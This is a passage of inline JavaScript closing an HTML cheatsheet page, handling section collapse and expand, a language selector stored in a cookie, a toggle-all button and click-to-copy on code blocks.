            const collapsedIcon = icon.getAttribute('data-collapsed');
            icon.textContent = collapsed ? collapsedIcon : expandedIcon;
        });
        
        document.querySelectorAll('.section-header').forEach(header => {
            header.setAttribute('aria-expanded', !collapsed);
        });

        const toggleKey = collapsed ? 'toggleButtonCollapsed' : 'toggleButtonExpanded';
        toggleButton.textContent = translations[toggleKey][lang];
    }
    
    // --- INITIALIZATION ---
    window.onload = function() {
        // 1. Set up section expand/collapse functionality
        setupSectionToggles();
        
        // 2. Get preferred language (default to English)
        const storedLang = getCookie('cheatsheet_lang') || 'en';

        // 3. Set up language dropdown event listener
        const langSelect = document.getElementById('languageSelect');
        if (langSelect) {
            langSelect.addEventListener('change', function() {
                translate(this.value);
            });
        }

        // 4. Set up master toggle handler
        document.getElementById('toggleAllButton').addEventListener('click', toggleAll);
        
        // 5. Set up the "Click-to-Copy" handlers on all <pre> blocks
        document.querySelectorAll('pre').forEach(pre => {
            pre.addEventListener('click', function(event) {
                // Ensure we only trigger on the PRE or CODE content, not other elements we might add (like the feedback span)
                if (!event.target.classList.contains('copy-feedback')) {
                    copyCommand(this);
                }
            });
        });
        
        // 6. Final translation call to apply initial text and language
        translate(storedLang);
    };
</script>

</body>
</html>